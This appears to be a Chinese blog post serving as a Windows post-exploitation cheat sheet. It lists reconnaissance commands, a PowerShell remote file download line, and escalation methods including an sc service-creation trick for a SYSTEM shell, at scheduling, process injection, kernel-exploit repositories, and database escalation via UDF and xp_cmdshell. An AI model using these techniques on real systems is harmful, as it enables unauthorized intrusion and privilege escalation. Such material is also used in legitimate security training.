后渗透提权

常用信息收集命令

systeminfo  打印系统信息

在这里插入图片描述

whoami/priv  当前帐户权限

在这里插入图片描述

ipconfig/dispalydns  显示dns信息

在这里插入图片描述

route print 打印路由表

在这里插入图片描述

arp -a   打印arp表
net user  列出表名
net user username  关于用户的信息
net use \SMBPATH Pa$$wOrd/u:username  连接SMB
net localgroup  列出所有组 
net view\127.0.0.1   会话打开到当前计算机
net session  开放给其他机器
netsh firewall show config  显示防火墙配置
DRIVERQUERY	 列出安装的驱动
tasklist /svc  列出服务任务
net start  列出启动的服务
dir /s foo  在目录中搜索包含指定字符的项目
dir /s foo == bar 同上
sc query 列出所有服务
sc qc servicename  找到指定服务的路径
shutdown /r /t 0  重启
type file.txt  打印内容
icacls "C:\example"  列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn  列出已进安装的补丁
New-Object System.Net.WebClient).DownloadFile(“http://host/file”,”C:\LocalPath”) 利用ps远程下载文件搭配本地
accesschk.exe -qwsu "Group" 修改对象 
quser or query user 获取在线用户 
netstat -ano | findstr 3389 获取rdp连接来源ip
dir c:\programdata\  分析安装杀软
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber    #获取远程端口
tasklist /svc | find "TermService" + netstat -ano  		  #获取远程端口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

收集补丁信息:找到没有进行补丁的编号,尝试通过ms系列提权;
收集服务器作用:判断是否有可提权的服务或杀软服务,不同杀软不同绕过方式;
收集权限作用:根据权限来判断是否进行提权;
收集网络配置信息:可以后期横向扩展

windows提权

  • 提权分类

系统溢出漏洞
第三方服务提权
数据库提权
本地提权

系统溢出提权
手工查找补丁情况:
systeminfo
Wmic qfe get Caption,Description,HotFixID,InstaslledON

MSF后渗透扫描:
post/windows/gather/enum_pathes

PowerShell扫描:
Imoprt-Mouble C:\Sherlock.ps1
Find-AllVulns

补丁漏洞查找网站:
https://github.com/ianxtianxt/win-exp-
https://github.com/SecWiki/windows-kernel-exploits

Psexec提权:
使用Psexec工具打开system权限的cmd窗口,其中:i 表示交互式,s 表示system移动到这个目录下,方便直接打开。

AT提权:
系统调度任务的命令
at 14:53 /interactive cmd
以system的权限打开cmd,之后在此cmd打开的应用都是system的权限

窗口权限提权:
在system权限的窗口中打开任务管理器(taskmgr),然后结束桌面进程,创建一个新的桌面进程(explorer),以后在桌面中打开的cmd窗口都是以system权限运行的。

服务方式提权:
采用服务方式提权,这是因为所有的服务都会默认以system账号去启动,所以借助这个思路,去创建一个服务(打开cmd服务),之后启动这个服务,打开的cmd命令行窗口就是以system权限启动的。
sc Create SuperCMD binpath= “cmd /k start” type= own type= interact
Sc start SuperCMD
Sc delete SuperCMD

注入进程提权:
Pinjector找一个system运行的服务进程,把自己注入到进程里面,注入到进程里面就和进程有同样的用户权限,即system

第三方服务提权
步骤:
信息收集阶段
收集软件的版本信息
收集软件目录端口信息
根据相关信息利用公开EXP提权
上传大马进行提权操作
针对不同软件有不同思路
1.FTP提权
serv-u 提权\G6-FTP提权\FileZilla提权\FlashFXP提权\PcAnywhere提权\Xlight FTP Server 提权
2.远程软件提权
VNC提权Radmin hash 提权漏洞

数据库提权
1.Mysql提权
udf提权
启动项提权
mof提权
2.SQL Server提权
利用xp_cmdshell提权
使用sp_oacreate进行提权
使用沙盒进行提权
3.Oracle提权

本地提权
1.溢出提权
远程溢出
本地溢出
2.Getpass提权
3.hash传递入侵
4.lpk提权

其他

在这里插入图片描述

  • 常见的网站编译器

FCKeditor
eWebEditor
Cute Editor
Webhtmleditor
Kindeditor
Freetextbox

编译器详细讲解:https://www.jb51.net/article/26841.htm

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值